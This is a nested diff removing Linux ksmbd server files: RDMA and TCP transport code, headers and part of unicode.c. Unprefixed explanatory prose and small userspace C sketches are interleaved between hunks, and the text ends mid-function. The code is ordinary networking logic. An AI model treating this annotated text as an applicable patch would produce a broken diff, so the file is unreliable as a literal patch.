+-	struct smb_direct_device *smb_dev;
+-	int i;
+-	bool rdma_capable = false;
+-
+-	read_lock(&smb_direct_device_lock);
+-	list_for_each_entry(smb_dev, &smb_direct_device_list, list) {
+-		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
+-			struct net_device *ndev;
+-
+-			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
+-							       i + 1);
+-			if (!ndev)
+-				continue;
+-
+-			if (ndev == netdev) {
+-				dev_put(ndev);
+-				rdma_capable = true;
+-				goto out;
+-			}
+-			dev_put(ndev);
+-		}
+-	}
+-out:
+-	read_unlock(&smb_direct_device_lock);
+-
+-	if (!rdma_capable) {
+-		struct ib_device *ibdev;
+-
+-		ibdev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_UNKNOWN);
+-		if (ibdev) {
+-			if (rdma_frwr_is_supported(&ibdev->attrs))
+-				rdma_capable = true;
+-			ib_device_put(ibdev);
+-		}
+-	}
+-
+-	return rdma_capable;
+-}
+-
+-static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops = {
+-	.prepare	= smb_direct_prepare,
+-	.disconnect	= smb_direct_disconnect,
+-	.shutdown	= smb_direct_shutdown,
+-	.writev		= smb_direct_writev,
+-	.read		= smb_direct_read,
+-	.rdma_read	= smb_direct_rdma_read,
+-	.rdma_write	= smb_direct_rdma_write,
+-};
+diff --git a/fs/ksmbd/transport_rdma.h b/fs/ksmbd/transport_rdma.h
+deleted file mode 100644
+index 77aee4e5c9dcd..0000000000000
+--- a/fs/ksmbd/transport_rdma.h
++++ /dev/null
+@@ -1,69 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2017, Microsoft Corporation.
+- *   Copyright (C) 2018, LG Electronics.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_RDMA_H__
+-#define __KSMBD_TRANSPORT_RDMA_H__
+-
+-#define SMBD_DEFAULT_IOSIZE (8 * 1024 * 1024)
+-#define SMBD_MIN_IOSIZE (512 * 1024)
+-#define SMBD_MAX_IOSIZE (16 * 1024 * 1024)
+-
+-/* SMB DIRECT negotiation request packet [MS-SMBD] 2.2.1 */
+-struct smb_direct_negotiate_req {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-/* SMB DIRECT negotiation response packet [MS-SMBD] 2.2.2 */
+-struct smb_direct_negotiate_resp {
+-	__le16 min_version;
+-	__le16 max_version;
+-	__le16 negotiated_version;
+-	__le16 reserved;
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le32 status;
+-	__le32 max_readwrite_size;
+-	__le32 preferred_send_size;
+-	__le32 max_receive_size;
+-	__le32 max_fragmented_size;
+-} __packed;
+-
+-#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
+-
+-/* SMB DIRECT data transfer packet with payload [MS-SMBD] 2.2.3 */
+-struct smb_direct_data_transfer {
+-	__le16 credits_requested;
+-	__le16 credits_granted;
+-	__le16 flags;
+-	__le16 reserved;
+-	__le32 remaining_data_length;
+-	__le32 data_offset;
+-	__le32 data_length;
+-	__le32 padding;
+-	__u8 buffer[];
+-} __packed;
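
All three wire structs are packed and little-endian. A small sketch that decodes the fixed 24-byte data-transfer header from a raw byte buffer with explicit LE loads, avoiding any reliance on compiler struct layout (the header bytes are invented for the example):

#include <stdint.h>
#include <stdio.h>

static uint16_t get_le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t get_le32(const uint8_t *p)
{
	return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
	       (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

int main(void)
{
	/* Invented example: 2 credits requested, 1 granted, 16 data bytes at offset 24. */
	uint8_t hdr[24] = { 0x02, 0, 0x01, 0, 0, 0, 0, 0,
			    0, 0, 0, 0, 0x18, 0, 0, 0, 0x10, 0, 0, 0, 0, 0, 0, 0 };

	printf("credits_requested=%u credits_granted=%u flags=%#x\n",
	       get_le16(hdr), get_le16(hdr + 2), get_le16(hdr + 4));
	printf("remaining=%u data_offset=%u data_length=%u\n",
	       get_le32(hdr + 8), get_le32(hdr + 12), get_le32(hdr + 16));
	return 0;
}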
+-
+-#ifdef CONFIG_SMB_SERVER_SMBDIRECT
+-int ksmbd_rdma_init(void);
+-void ksmbd_rdma_destroy(void);
+-bool ksmbd_rdma_capable_netdev(struct net_device *netdev);
+-void init_smbd_max_io_size(unsigned int sz);
+-unsigned int get_smbd_max_read_write_size(void);
+-#else
+-static inline int ksmbd_rdma_init(void) { return 0; }
+-static inline int ksmbd_rdma_destroy(void) { return 0; }
+-static inline bool ksmbd_rdma_capable_netdev(struct net_device *netdev) { return false; }
+-static inline void init_smbd_max_io_size(unsigned int sz) { }
+-static inline unsigned int get_smbd_max_read_write_size(void) { return 0; }
+-#endif
+-
+-#endif /* __KSMBD_TRANSPORT_RDMA_H__ */
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+deleted file mode 100644
+index eff7a1d793f00..0000000000000
+--- a/fs/ksmbd/transport_tcp.c
++++ /dev/null
+@@ -1,649 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/freezer.h>
+-
+-#include "smb_common.h"
+-#include "server.h"
+-#include "auth.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-
+-#define IFACE_STATE_DOWN		BIT(0)
+-#define IFACE_STATE_CONFIGURED		BIT(1)
+-
+-static atomic_t active_num_conn;
+-
+-struct interface {
+-	struct task_struct	*ksmbd_kthread;
+-	struct socket		*ksmbd_socket;
+-	struct list_head	entry;
+-	char			*name;
+-	struct mutex		sock_release_lock;
+-	int			state;
+-};
+-
+-static LIST_HEAD(iface_list);
+-
+-static int bind_additional_ifaces;
+-
+-struct tcp_transport {
+-	struct ksmbd_transport		transport;
+-	struct socket			*sock;
+-	struct kvec			*iov;
+-	unsigned int			nr_iov;
+-};
+-
+-static struct ksmbd_transport_ops ksmbd_tcp_transport_ops;
+-
+-static void tcp_stop_kthread(struct task_struct *kthread);
+-static struct interface *alloc_iface(char *ifname);
+-
+-#define KSMBD_TRANS(t)	(&(t)->transport)
+-#define TCP_TRANS(t)	((struct tcp_transport *)container_of(t, \
+-				struct tcp_transport, transport))
+-
+-static inline void ksmbd_tcp_nodelay(struct socket *sock)
+-{
+-	tcp_sock_set_nodelay(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_reuseaddr(struct socket *sock)
+-{
+-	sock_set_reuseaddr(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_rcv_timeout(struct socket *sock, s64 secs)
+-{
+-	lock_sock(sock->sk);
+-	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
+-		sock->sk->sk_rcvtimeo = secs * HZ;
+-	else
+-		sock->sk->sk_rcvtimeo = MAX_SCHEDULE_TIMEOUT;
+-	release_sock(sock->sk);
+-}
+-
+-static inline void ksmbd_tcp_snd_timeout(struct socket *sock, s64 secs)
+-{
+-	sock_set_sndtimeo(sock->sk, secs);
+-}
+-
+-static struct tcp_transport *alloc_transport(struct socket *client_sk)
+-{
+-	struct tcp_transport *t;
+-	struct ksmbd_conn *conn;
+-
+-	t = kzalloc(sizeof(*t), GFP_KERNEL);
+-	if (!t)
+-		return NULL;
+-	t->sock = client_sk;
+-
+-	conn = ksmbd_conn_alloc();
+-	if (!conn) {
+-		kfree(t);
+-		return NULL;
+-	}
+-
+-	conn->transport = KSMBD_TRANS(t);
+-	KSMBD_TRANS(t)->conn = conn;
+-	KSMBD_TRANS(t)->ops = &ksmbd_tcp_transport_ops;
+-	return t;
+-}
+-
+-static void free_transport(struct tcp_transport *t)
+-{
+-	kernel_sock_shutdown(t->sock, SHUT_RDWR);
+-	sock_release(t->sock);
+-	t->sock = NULL;
+-
+-	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
+-	kfree(t->iov);
+-	kfree(t);
+-}
+-
+-/**
+- * kvec_array_init() - initialize an IO vector segment
+- * @new:	IO vector to be initialized
+- * @iov:	base IO vector
+- * @nr_segs:	number of segments in base iov
+- * @bytes:	total iovec length so far for read
+- *
+- * Return:	Number of IO segments
+- */
+-static unsigned int kvec_array_init(struct kvec *new, struct kvec *iov,
+-				    unsigned int nr_segs, size_t bytes)
+-{
+-	size_t base = 0;
+-
+-	while (bytes || !iov->iov_len) {
+-		int copy = min(bytes, iov->iov_len);
+-
+-		bytes -= copy;
+-		base += copy;
+-		if (iov->iov_len == base) {
+-			iov++;
+-			nr_segs--;
+-			base = 0;
+-		}
+-	}
+-
+-	memcpy(new, iov, sizeof(*iov) * nr_segs);
+-	new->iov_base += base;
+-	new->iov_len -= base;
+-	return nr_segs;
+-}
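
The same resume-mid-segment idea can be stated in userspace terms for readers less used to kvec handling: advance a struct iovec array past the bytes already consumed, trimming the segment the cursor lands in. A sketch only; unlike the kernel helper above, it mutates the array in place instead of copying:

#include <stdio.h>
#include <sys/uio.h>

/* Advance *iovp past 'consumed' bytes; returns the remaining segment count. */
static int iov_advance(struct iovec **iovp, int nr, size_t consumed)
{
	struct iovec *iov = *iovp;

	while (nr && consumed >= iov->iov_len) {
		consumed -= iov->iov_len;
		iov++;
		nr--;
	}
	if (nr) {
		iov->iov_base = (char *)iov->iov_base + consumed;
		iov->iov_len -= consumed;
	}
	*iovp = iov;
	return nr;
}

int main(void)
{
	char a[] = "abcd", b[] = "efgh";
	struct iovec v[2] = { { a, 4 }, { b, 4 } };
	struct iovec *p = v;
	int nr = iov_advance(&p, 2, 6);	/* 6 of 8 bytes already read */

	printf("%d segment(s) left, next byte '%c'\n", nr, *(char *)p->iov_base);
	return 0;
}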
+-
+-/**
+- * get_conn_iovec() - get connection iovec for reading from socket
+- * @t:		TCP transport instance
+- * @nr_segs:	number of segments in iov
+- *
+- * Return:	existing or newly allocated iovec
+- */
+-static struct kvec *get_conn_iovec(struct tcp_transport *t, unsigned int nr_segs)
+-{
+-	struct kvec *new_iov;
+-
+-	if (t->iov && nr_segs <= t->nr_iov)
+-		return t->iov;
+-
+-	/* not big enough -- allocate a new one and release the old */
+-	new_iov = kmalloc_array(nr_segs, sizeof(*new_iov), GFP_KERNEL);
+-	if (new_iov) {
+-		kfree(t->iov);
+-		t->iov = new_iov;
+-		t->nr_iov = nr_segs;
+-	}
+-	return new_iov;
+-}
+-
+-static unsigned short ksmbd_tcp_get_port(const struct sockaddr *sa)
+-{
+-	switch (sa->sa_family) {
+-	case AF_INET:
+-		return ntohs(((struct sockaddr_in *)sa)->sin_port);
+-	case AF_INET6:
+-		return ntohs(((struct sockaddr_in6 *)sa)->sin6_port);
+-	}
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_tcp_new_connection() - set up a session for a newly accepted socket
+- * @client_sk:	socket associated with new connection
+- *
+- * Whenever a new connection is requested, create a conn thread
+- * (session thread) to handle incoming SMB requests from that connection.
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int ksmbd_tcp_new_connection(struct socket *client_sk)
+-{
+-	struct sockaddr *csin;
+-	int rc = 0;
+-	struct tcp_transport *t;
+-
+-	t = alloc_transport(client_sk);
+-	if (!t) {
+-		sock_release(client_sk);
+-		return -ENOMEM;
+-	}
+-
+-	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
+-	if (kernel_getpeername(client_sk, csin) < 0) {
+-		pr_err("client ip resolution failed\n");
+-		rc = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn,
+-					      "ksmbd:%u",
+-					      ksmbd_tcp_get_port(csin));
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		pr_err("cannot start conn thread\n");
+-		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
+-		free_transport(t);
+-	}
+-	return rc;
+-
+-out_error:
+-	free_transport(t);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_kthread_fn() - listen to new SMB connections and callback server
+- * @p:		arguments to forker thread
+- *
+- * Return:	0 on success, error number otherwise
+- */
+-static int ksmbd_kthread_fn(void *p)
+-{
+-	struct socket *client_sk = NULL;
+-	struct interface *iface = (struct interface *)p;
+-	int ret;
+-
+-	while (!kthread_should_stop()) {
+-		mutex_lock(&iface->sock_release_lock);
+-		if (!iface->ksmbd_socket) {
+-			mutex_unlock(&iface->sock_release_lock);
+-			break;
+-		}
+-		ret = kernel_accept(iface->ksmbd_socket, &client_sk,
+-				    SOCK_NONBLOCK);
+-		mutex_unlock(&iface->sock_release_lock);
+-		if (ret) {
+-			if (ret == -EAGAIN)
+-				/* check for new connections every 100 msecs */
+-				schedule_timeout_interruptible(HZ / 10);
+-			continue;
+-		}
+-
+-		if (server_conf.max_connections &&
+-		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
+-			pr_info_ratelimited("Limit the maximum number of connections (%u)\n",
+-					    atomic_read(&active_num_conn));
+-			atomic_dec(&active_num_conn);
+-			sock_release(client_sk);
+-			continue;
+-		}
+-
+-		ksmbd_debug(CONN, "connect success: accepted new connection\n");
+-		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
+-		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+-
+-		ksmbd_tcp_new_connection(client_sk);
+-	}
+-
+-	ksmbd_debug(CONN, "releasing socket\n");
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_tcp_run_kthread() - start forker thread
+- * @iface: pointer to struct interface
+- *
+- * Start the forker thread (ksmbd/0) at module init time to listen
+- * on port 445 for new SMB connection requests. It creates per-connection
+- * server threads (ksmbd/x).
+- *
+- * Return:	0 on success or error number
+- */
+-static int ksmbd_tcp_run_kthread(struct interface *iface)
+-{
+-	int rc;
+-	struct task_struct *kthread;
+-
+-	kthread = kthread_run(ksmbd_kthread_fn, (void *)iface, "ksmbd-%s",
+-			      iface->name);
+-	if (IS_ERR(kthread)) {
+-		rc = PTR_ERR(kthread);
+-		return rc;
+-	}
+-	iface->ksmbd_kthread = kthread;
+-
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_tcp_readv() - read data from socket in given iovec
+- * @t:			TCP transport instance
+- * @iov_orig:		base IO vector
+- * @nr_segs:		number of segments in base iov
+- * @to_read:		number of bytes to read from socket
+- * @max_retries:	maximum retry count
+- *
+- * Return:	on success return number of bytes read from socket,
+- *		otherwise return error number
+- */
+-static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
+-			   unsigned int nr_segs, unsigned int to_read,
+-			   int max_retries)
+-{
+-	int length = 0;
+-	int total_read;
+-	unsigned int segs;
+-	struct msghdr ksmbd_msg;
+-	struct kvec *iov;
+-	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
+-
+-	iov = get_conn_iovec(t, nr_segs);
+-	if (!iov)
+-		return -ENOMEM;
+-
+-	ksmbd_msg.msg_control = NULL;
+-	ksmbd_msg.msg_controllen = 0;
+-
+-	for (total_read = 0; to_read; total_read += length, to_read -= length) {
+-		try_to_freeze();
+-
+-		if (!ksmbd_conn_alive(conn)) {
+-			total_read = -ESHUTDOWN;
+-			break;
+-		}
+-		segs = kvec_array_init(iov, iov_orig, nr_segs, total_read);
+-
+-		length = kernel_recvmsg(t->sock, &ksmbd_msg,
+-					iov, segs, to_read, 0);
+-
+-		if (length == -EINTR) {
+-			total_read = -ESHUTDOWN;
+-			break;
+-		} else if (ksmbd_conn_need_reconnect(conn)) {
+-			total_read = -EAGAIN;
+-			break;
+-		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
+-			/*
+-			 * If max_retries is negative, allow unlimited
+-			 * retries to keep the connection to inactive sessions alive.
+-			 */
+-			if (max_retries == 0) {
+-				total_read = length;
+-				break;
+-			} else if (max_retries > 0) {
+-				max_retries--;
+-			}
+-
+-			usleep_range(1000, 2000);
+-			length = 0;
+-			continue;
+-		} else if (length <= 0) {
+-			total_read = length;
+-			break;
+-		}
+-	}
+-	return total_read;
+-}
+-
+-/**
+- * ksmbd_tcp_read() - read data from socket in given buffer
+- * @t:		TCP transport instance
+- * @buf:	buffer to store read data from socket
+- * @to_read:	number of bytes to read from socket
+- *
+- * Return:	on success return number of bytes read from socket,
+- *		otherwise return error number
+- */
+-static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
+-			  unsigned int to_read, int max_retries)
+-{
+-	struct kvec iov;
+-
+-	iov.iov_base = buf;
+-	iov.iov_len = to_read;
+-
+-	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
+-}
+-
+-static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+-			    int nvecs, int size, bool need_invalidate,
+-			    unsigned int remote_key)
+-
+-{
+-	struct msghdr smb_msg = {.msg_flags = MSG_NOSIGNAL};
+-
+-	return kernel_sendmsg(TCP_TRANS(t)->sock, &smb_msg, iov, nvecs, size);
+-}
+-
+-static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
+-{
+-	free_transport(TCP_TRANS(t));
+-	if (server_conf.max_connections)
+-		atomic_dec(&active_num_conn);
+-}
+-
+-static void tcp_destroy_socket(struct socket *ksmbd_socket)
+-{
+-	int ret;
+-
+-	if (!ksmbd_socket)
+-		return;
+-
+-	/* set zero to timeout */
+-	ksmbd_tcp_rcv_timeout(ksmbd_socket, 0);
+-	ksmbd_tcp_snd_timeout(ksmbd_socket, 0);
+-
+-	ret = kernel_sock_shutdown(ksmbd_socket, SHUT_RDWR);
+-	if (ret)
+-		pr_err("Failed to shutdown socket: %d\n", ret);
+-	sock_release(ksmbd_socket);
+-}
+-
+-/**
+- * create_socket - create the listening socket for an interface
+- * @iface:	interface to bind the new socket to
+- *
+- * Return:	0 on success, error number otherwise
+- */
+-static int create_socket(struct interface *iface)
+-{
+-	int ret;
+-	struct sockaddr_in6 sin6;
+-	struct sockaddr_in sin;
+-	struct socket *ksmbd_socket;
+-	bool ipv4 = false;
+-
+-	ret = sock_create(PF_INET6, SOCK_STREAM, IPPROTO_TCP, &ksmbd_socket);
+-	if (ret) {
+-		if (ret != -EAFNOSUPPORT)
+-			pr_err("Can't create socket for ipv6, fallback to ipv4: %d\n", ret);
+-		ret = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,
+-				  &ksmbd_socket);
+-		if (ret) {
+-			pr_err("Can't create socket for ipv4: %d\n", ret);
+-			goto out_clear;
+-		}
+-
+-		sin.sin_family = PF_INET;
+-		sin.sin_addr.s_addr = htonl(INADDR_ANY);
+-		sin.sin_port = htons(server_conf.tcp_port);
+-		ipv4 = true;
+-	} else {
+-		sin6.sin6_family = PF_INET6;
+-		sin6.sin6_addr = in6addr_any;
+-		sin6.sin6_port = htons(server_conf.tcp_port);
+-	}
+-
+-	ksmbd_tcp_nodelay(ksmbd_socket);
+-	ksmbd_tcp_reuseaddr(ksmbd_socket);
+-
+-	ret = sock_setsockopt(ksmbd_socket,
+-			      SOL_SOCKET,
+-			      SO_BINDTODEVICE,
+-			      KERNEL_SOCKPTR(iface->name),
+-			      strlen(iface->name));
+-	if (ret != -ENODEV && ret < 0) {
+-		pr_err("Failed to set SO_BINDTODEVICE: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	if (ipv4)
+-		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin,
+-				  sizeof(sin));
+-	else
+-		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin6,
+-				  sizeof(sin6));
+-	if (ret) {
+-		pr_err("Failed to bind socket: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	ksmbd_socket->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
+-	ksmbd_socket->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+-
+-	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
+-	if (ret) {
+-		pr_err("Port listen() error: %d\n", ret);
+-		goto out_error;
+-	}
+-
+-	iface->ksmbd_socket = ksmbd_socket;
+-	ret = ksmbd_tcp_run_kthread(iface);
+-	if (ret) {
+-		pr_err("Can't start ksmbd main kthread: %d\n", ret);
+-		goto out_error;
+-	}
+-	iface->state = IFACE_STATE_CONFIGURED;
+-
+-	return 0;
+-
+-out_error:
+-	tcp_destroy_socket(ksmbd_socket);
+-out_clear:
+-	iface->ksmbd_socket = NULL;
+-	return ret;
+-}
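
The IPv6-first-then-IPv4 fallback above has a straightforward POSIX equivalent; a sketch with an invented test port, omitting SO_BINDTODEVICE and the timeout tuning:

#include <errno.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
	struct sockaddr_in6 sin6 = { .sin6_family = AF_INET6,
				     .sin6_addr = in6addr_any,
				     .sin6_port = htons(4445) };  /* invented port */
	struct sockaddr_in sin = { .sin_family = AF_INET,
				   .sin_addr.s_addr = htonl(INADDR_ANY),
				   .sin_port = htons(4445) };
	int ret = -1;
	int fd = socket(AF_INET6, SOCK_STREAM, 0);

	if (fd >= 0) {
		ret = bind(fd, (struct sockaddr *)&sin6, sizeof(sin6));
	} else if (errno == EAFNOSUPPORT) {
		/* No IPv6 support: fall back to IPv4, as create_socket() does. */
		fd = socket(AF_INET, SOCK_STREAM, 0);
		if (fd >= 0)
			ret = bind(fd, (struct sockaddr *)&sin, sizeof(sin));
	}
	if (fd < 0 || ret != 0 || listen(fd, 64) != 0) {
		perror("listen setup");
		return 1;
	}
	puts("listening");
	close(fd);
	return 0;
}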
+-
+-static int ksmbd_netdev_event(struct notifier_block *nb, unsigned long event,
+-			      void *ptr)
+-{
+-	struct net_device *netdev = netdev_notifier_info_to_dev(ptr);
+-	struct interface *iface;
+-	int ret, found = 0;
+-
+-	switch (event) {
+-	case NETDEV_UP:
+-		if (netif_is_bridge_port(netdev))
+-			return NOTIFY_OK;
+-
+-		list_for_each_entry(iface, &iface_list, entry) {
+-			if (!strcmp(iface->name, netdev->name)) {
+-				found = 1;
+-				if (iface->state != IFACE_STATE_DOWN)
+-					break;
+-				ret = create_socket(iface);
+-				if (ret)
+-					return NOTIFY_OK;
+-				break;
+-			}
+-		}
+-		if (!found && bind_additional_ifaces) {
+-			iface = alloc_iface(kstrdup(netdev->name, GFP_KERNEL));
+-			if (!iface)
+-				return NOTIFY_OK;
+-			ret = create_socket(iface);
+-			if (ret)
+-				break;
+-		}
+-		break;
+-	case NETDEV_DOWN:
+-		list_for_each_entry(iface, &iface_list, entry) {
+-			if (!strcmp(iface->name, netdev->name) &&
+-			    iface->state == IFACE_STATE_CONFIGURED) {
+-				tcp_stop_kthread(iface->ksmbd_kthread);
+-				iface->ksmbd_kthread = NULL;
+-				mutex_lock(&iface->sock_release_lock);
+-				tcp_destroy_socket(iface->ksmbd_socket);
+-				iface->ksmbd_socket = NULL;
+-				mutex_unlock(&iface->sock_release_lock);
+-
+-				iface->state = IFACE_STATE_DOWN;
+-				break;
+-			}
+-		}
+-		break;
+-	}
+-
+-	return NOTIFY_DONE;
+-}
+-
+-static struct notifier_block ksmbd_netdev_notifier = {
+-	.notifier_call = ksmbd_netdev_event,
+-};
+-
+-int ksmbd_tcp_init(void)
+-{
+-	register_netdevice_notifier(&ksmbd_netdev_notifier);
+-
+-	return 0;
+-}
+-
+-static void tcp_stop_kthread(struct task_struct *kthread)
+-{
+-	int ret;
+-
+-	if (!kthread)
+-		return;
+-
+-	ret = kthread_stop(kthread);
+-	if (ret)
+-		pr_err("failed to stop forker thread\n");
+-}
+-
+-void ksmbd_tcp_destroy(void)
+-{
+-	struct interface *iface, *tmp;
+-
+-	unregister_netdevice_notifier(&ksmbd_netdev_notifier);
+-
+-	list_for_each_entry_safe(iface, tmp, &iface_list, entry) {
+-		list_del(&iface->entry);
+-		kfree(iface->name);
+-		kfree(iface);
+-	}
+-}
+-
+-static struct interface *alloc_iface(char *ifname)
+-{
+-	struct interface *iface;
+-
+-	if (!ifname)
+-		return NULL;
+-
+-	iface = kzalloc(sizeof(struct interface), GFP_KERNEL);
+-	if (!iface) {
+-		kfree(ifname);
+-		return NULL;
+-	}
+-
+-	iface->name = ifname;
+-	iface->state = IFACE_STATE_DOWN;
+-	list_add(&iface->entry, &iface_list);
+-	mutex_init(&iface->sock_release_lock);
+-	return iface;
+-}
+-
+-int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
+-{
+-	int sz = 0;
+-
+-	if (!ifc_list_sz) {
+-		struct net_device *netdev;
+-
+-		rtnl_lock();
+-		for_each_netdev(&init_net, netdev) {
+-			if (netif_is_bridge_port(netdev))
+-				continue;
+-			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL)))
+-				return -ENOMEM;
+-		}
+-		rtnl_unlock();
+-		bind_additional_ifaces = 1;
+-		return 0;
+-	}
+-
+-	while (ifc_list_sz > 0) {
+-		if (!alloc_iface(kstrdup(ifc_list, GFP_KERNEL)))
+-			return -ENOMEM;
+-
+-		sz = strlen(ifc_list);
+-		if (!sz)
+-			break;
+-
+-		ifc_list += sz + 1;
+-		ifc_list_sz -= (sz + 1);
+-	}
+-
+-	bind_additional_ifaces = 0;
+-
+-	return 0;
+-}
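
The interface list arrives as one buffer of back-to-back NUL-terminated names, which the loop above walks by strlen() + 1. A tiny sketch of the same walk with invented sample data:

#include <stdio.h>
#include <string.h>

int main(void)
{
	/* Two names packed back to back, as userspace would pass them. */
	char list[] = "eth0\0eth1";
	int sz = (int)sizeof(list);	/* counts both terminators */
	const char *p = list;

	while (sz > 0 && *p) {
		int len = (int)strlen(p);

		printf("interface: %s\n", p);
		p += len + 1;	/* skip the name and its NUL */
		sz -= len + 1;
	}
	return 0;
}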
+-
+-static struct ksmbd_transport_ops ksmbd_tcp_transport_ops = {
+-	.read		= ksmbd_tcp_read,
+-	.writev		= ksmbd_tcp_writev,
+-	.disconnect	= ksmbd_tcp_disconnect,
+-};
+diff --git a/fs/ksmbd/transport_tcp.h b/fs/ksmbd/transport_tcp.h
+deleted file mode 100644
+index e338bebe322f1..0000000000000
+--- a/fs/ksmbd/transport_tcp.h
++++ /dev/null
+@@ -1,13 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_TRANSPORT_TCP_H__
+-#define __KSMBD_TRANSPORT_TCP_H__
+-
+-int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz);
+-int ksmbd_tcp_init(void);
+-void ksmbd_tcp_destroy(void);
+-
+-#endif /* __KSMBD_TRANSPORT_TCP_H__ */
+diff --git a/fs/ksmbd/unicode.c b/fs/ksmbd/unicode.c
+deleted file mode 100644
+index a0db699ddafda..0000000000000
+--- a/fs/ksmbd/unicode.c
++++ /dev/null
+@@ -1,384 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Some of the source code in this file came from fs/cifs/cifs_unicode.c
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2009
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- *   Modified by Namjae Jeon (linkinjeon@kernel.org)
+- */
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <asm/unaligned.h>
+-#include "glob.h"
+-#include "unicode.h"
+-#include "uniupr.h"
+-#include "smb_common.h"
+-
+-/*
+- * smb_utf16_bytes() - how long will a string be after conversion?
+- * @from:	pointer to input string
+- * @maxbytes:	don't go past this many bytes of input string
+- * @codepage:	destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+-			   const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
+-		if (charlen > 0)
+-			outlen += charlen;
+-		else
+-			outlen++;
+-	}
+-
+-	return outlen;
+-}
+-
+-/*
+- * cifs_mapchar() - convert a host-endian char to proper char in codepage
+- * @target:	where converted character should be copied
+- * @src_char:	2 byte host-endian source character
+- * @cp:		codepage to which character should be converted
+- * @mapchar:	should character be mapped according to mapchars mount option?
+- *
+- * This function handles the conversion of a single character. It is the
+- * responsibility of the caller to ensure that the target buffer is large
+- * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
+- *
+- * Return:	string length after conversion
+- */
+-static int
+-cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
+-	     bool mapchar)
+-{
+-	int len = 1;
+-
+-	if (!mapchar)
+-		goto cp_convert;
+-
+-	/*
+-	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
+-	 *     build_path_from_dentry are modified, as they use slash as
+-	 *     separator.
+-	 */
+-	switch (src_char) {
+-	case UNI_COLON:
+-		*target = ':';
+-		break;
+-	case UNI_ASTERISK:
+-		*target = '*';
+-		break;
+-	case UNI_QUESTION:
+-		*target = '?';
+-		break;
+-	case UNI_PIPE:
+-		*target = '|';
